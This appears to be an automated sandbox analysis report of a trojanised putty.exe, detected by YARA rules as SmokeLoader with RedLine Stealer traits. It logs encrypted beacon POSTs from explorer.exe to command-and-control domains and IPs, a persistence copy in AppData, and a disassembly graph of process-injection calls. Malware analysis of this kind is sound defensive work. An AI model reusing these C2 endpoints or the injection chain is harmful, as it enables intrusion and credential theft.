68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            55192.168.2.55003294.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:32.910561085 CET283OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://nqrqvcheqmo.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 169
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:01:32.910592079 CET169OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be b5 50 33 8c
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)P3{d9C/+y>/(EtC;@4Z9?ESy<k|mF~nnM
                                            Dec 19, 2024 11:01:34.291301012 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:34 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            56192.168.2.550033194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:34.421761990 CET278OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://fkdpjansght.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 145
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:01:34.421787977 CET145OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 9c 3c 34 87
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)<4IBsnQ1/aC_S+H06T< qpy/"
                                            Dec 19, 2024 11:01:35.755727053 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:35 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            57192.168.2.55003494.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:39.873128891 CET285OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://viejsmtmgdxamty.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 234
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:01:39.873186111 CET234OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 87 10 74 91
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)t1yV+E"T/' F~oS30-*z$TM[rk~r*Z~T>{WWf>$fX!@PEbk$#ya)y?Ur{{^M[
                                            Dec 19, 2024 11:01:41.227861881 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:41 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            58192.168.2.55003594.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:41.715229988 CET288OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://quegfhrneryhjosy.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 338
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:01:41.715244055 CET338OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 83 45 6c 8b
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)EldD*1eH*B~m6s^@!x,uES]?lhS9Sbp{`,| r_wK6cul5k)9=UC?* cRa a
                                            Dec 19, 2024 11:01:43.091700077 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:42 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            59192.168.2.550036194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:43.223036051 CET283OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ldbqkqcjtqgsavin.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 281
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:01:43.223078012 CET281OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 86 58 35 9c
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)X5wt[1tcr7-Ye-)"5*-VmFQL/{R1z!6vfLZfuU4b\{9+`Fqgv!Kf[Hdqu\{k~
                                            Dec 19, 2024 11:01:44.556948900 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:44 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            60192.168.2.55003794.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 11:01:49.725538015 CET284OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://mmxcodigejxhlx.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 317
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:01:49.725586891 CET317OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e8 19 4e ba
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)N$I) h>",E^Xi2sf1jh~^^Wy~p1<cUDr$|&2#Bps'E]ihNjescrS57!W>'
                                            Dec 19, 2024 11:01:51.089430094 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:01:50 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:04:57:43
                                            Start date:19/12/2024
                                            Path:C:\Users\user\Desktop\putty.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\putty.exe"
                                            Imagebase:0x400000
                                            File size:245'760 bytes
                                            MD5 hash:3BBAC642557B0AB934ADDBAC0594561C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2177303401.0000000000950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2177303401.0000000000950000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.2110499167.0000000000950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2177166657.0000000000849000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2177275719.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:04:57:51
                                            Start date:19/12/2024
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff674740000
                                            File size:5'141'208 bytes
                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:4
                                            Start time:04:58:11
                                            Start date:19/12/2024
                                            Path:C:\Users\user\AppData\Roaming\hajefwb
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\hajefwb
                                            Imagebase:0x400000
                                            File size:245'760 bytes
                                            MD5 hash:3BBAC642557B0AB934ADDBAC0594561C
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2439322888.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2439682112.0000000000AA8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000003.2388445359.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 47%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:05:00:01
                                            Start date:19/12/2024
                                            Path:C:\Users\user\AppData\Roaming\hajefwb
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\hajefwb
                                            Imagebase:0x400000
                                            File size:245'760 bytes
                                            MD5 hash:3BBAC642557B0AB934ADDBAC0594561C
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:7.9%
                                              Dynamic/Decrypted Code Coverage:25.5%
                                              Signature Coverage:42.7%
                                              Total number of Nodes:192
                                              Total number of Limit Nodes:6
                                              execution_graph 5253 41ec00 5254 41ec0a __cfltcvt_init 5253->5254 5257 41f774 GetModuleHandleA 5254->5257 5256 41ec0f __setdefaultprecision 5258 41f783 GetProcAddress 5257->5258 5259 41f736 5257->5259 5258->5259 5259->5256 5407 4013ca 5408 4013d0 5407->5408 5409 401564 NtDuplicateObject 5408->5409 5418 401478 5408->5418 5410 401581 NtCreateSection 5409->5410 5409->5418 5411 401601 NtCreateSection 5410->5411 5412 4015a7 NtMapViewOfSection 5410->5412 5414 40162d 5411->5414 5411->5418 5412->5411 5413 4015ca NtMapViewOfSection 5412->5413 5413->5411 5415 4015e8 5413->5415 5416 401637 NtMapViewOfSection 5414->5416 5414->5418 5415->5411 5417 40165e NtMapViewOfSection 5416->5417 5416->5418 5417->5418 5249 402f8f 5250 4030d2 5249->5250 5251 402fb9 5249->5251 5251->5250 5252 403074 RtlCreateUserThread NtTerminateProcess 5251->5252 5252->5250 5329 40148f 5330 401414 5329->5330 5340 401478 5329->5340 5331 401564 NtDuplicateObject 5330->5331 5330->5340 5332 401581 NtCreateSection 5331->5332 5331->5340 5333 401601 NtCreateSection 5332->5333 5334 4015a7 NtMapViewOfSection 5332->5334 5336 40162d 5333->5336 5333->5340 5334->5333 5335 4015ca NtMapViewOfSection 5334->5335 5335->5333 5337 4015e8 5335->5337 5338 401637 NtMapViewOfSection 5336->5338 5336->5340 5337->5333 5339 40165e NtMapViewOfSection 5338->5339 5338->5340 5339->5340 5127 402e51 5128 402e44 5127->5128 5130 402ef2 5128->5130 5131 401891 5128->5131 5132 4018a1 5131->5132 5133 4018da Sleep 5132->5133 5138 4013bf 5133->5138 5135 4018f5 5137 401906 5135->5137 5150 4014b5 5135->5150 5137->5130 5139 4013d0 5138->5139 5140 401564 NtDuplicateObject 5139->5140 5142 401478 5139->5142 5141 401581 NtCreateSection 5140->5141 5140->5142 5143 401601 NtCreateSection 5141->5143 5144 4015a7 NtMapViewOfSection 5141->5144 5142->5135 5143->5142 5146 40162d 5143->5146 5144->5143 5145 4015ca NtMapViewOfSection 5144->5145 5145->5143 5147 4015e8 5145->5147 5146->5142 5148 401637 NtMapViewOfSection 5146->5148 5147->5143 5148->5142 5149 40165e NtMapViewOfSection 5148->5149 5149->5142 5151 4014c6 5150->5151 5152 401680 5151->5152 5153 401564 NtDuplicateObject 5151->5153 5152->5137 5153->5152 5154 401581 NtCreateSection 5153->5154 5155 401601 NtCreateSection 5154->5155 5156 4015a7 NtMapViewOfSection 5154->5156 5155->5152 5158 40162d 5155->5158 5156->5155 5157 4015ca NtMapViewOfSection 5156->5157 5157->5155 5159 4015e8 5157->5159 5158->5152 5160 401637 NtMapViewOfSection 5158->5160 5159->5155 5160->5152 5161 40165e NtMapViewOfSection 5160->5161 5161->5152 5162 41eb90 5165 41e7a0 5162->5165 5164 41eb95 5166 41e7d3 5165->5166 5167 41e854 GetDateFormatA 5166->5167 5168 41e896 5166->5168 5167->5166 5169 41e983 5168->5169 5170 41e8a5 7 API calls 5168->5170 5171 41e990 InterlockedDecrement GetCommandLineA SetErrorMode GetAtomNameA SearchPathA 5169->5171 5172 41ea4b LocalAlloc 5169->5172 5184 41e931 5170->5184 5174 41e9d9 7 API calls 5171->5174 5173 41ea6d 5172->5173 5186 41e560 LoadLibraryA 5173->5186 5176 41ea42 5174->5176 5177 41ea39 OpenFileMappingW 5174->5177 5176->5172 5177->5176 5178 41eaa6 5187 41e420 GetModuleHandleW GetProcAddress VirtualProtect 5178->5187 5180 41eaab 5188 41e710 5180->5188 5182 41eab0 5183 41eaea InterlockedIncrement 5182->5183 5185 41eafe 5182->5185 5183->5182 5184->5169 5185->5164 5186->5178 5187->5180 5197 41e600 5188->5197 5191 41e749 GetEnvironmentStringsW FindFirstVolumeW GetShortPathNameW 5192 41e76b 5191->5192 5200 41e640 5192->5200 5195 41e782 DeleteVolumeMountPointA 5196 41e78a 5195->5196 5196->5182 5198 41e625 5197->5198 5199 41e615 GetStartupInfoA GetModuleHandleA 5197->5199 5198->5191 5198->5192 5199->5198 5201 41e665 EndUpdateResourceA 5200->5201 5204 41e66f 5200->5204 5201->5204 5202 41e6db 5202->5195 5202->5196 5204->5202 5205 41e6bb GetNumaHighestNodeNumber GetComputerNameA 5204->5205 5206 41e630 5204->5206 5205->5204 5209 41e5c0 5206->5209 5210 41e5e9 5209->5210 5211 41e5dc ResetEvent 5209->5211 5210->5204 5211->5210 5279 940005 5284 94092b GetPEB 5279->5284 5281 940030 5286 94003c 5281->5286 5285 940972 5284->5285 5285->5281 5287 940049 5286->5287 5288 940e0f 2 API calls 5287->5288 5289 940223 5288->5289 5290 940d90 GetPEB 5289->5290 5291 940238 VirtualAlloc 5290->5291 5292 940265 5291->5292 5293 9402ce VirtualProtect 5292->5293 5295 94030b 5293->5295 5294 940439 VirtualFree 5298 9404be LoadLibraryA 5294->5298 5295->5294 5297 9408c7 5298->5297 5299 4014d3 5300 4014d8 5299->5300 5301 401564 NtDuplicateObject 5300->5301 5310 401680 5300->5310 5302 401581 NtCreateSection 5301->5302 5301->5310 5303 401601 NtCreateSection 5302->5303 5304 4015a7 NtMapViewOfSection 5302->5304 5306 40162d 5303->5306 5303->5310 5304->5303 5305 4015ca NtMapViewOfSection 5304->5305 5305->5303 5307 4015e8 5305->5307 5308 401637 NtMapViewOfSection 5306->5308 5306->5310 5307->5303 5309 40165e NtMapViewOfSection 5308->5309 5308->5310 5309->5310 5212 84c3d0 5215 84c3e0 5212->5215 5216 84c3ef 5215->5216 5219 84cb80 5216->5219 5220 84cb9b 5219->5220 5221 84cba4 CreateToolhelp32Snapshot 5220->5221 5222 84cbc0 Module32First 5220->5222 5221->5220 5221->5222 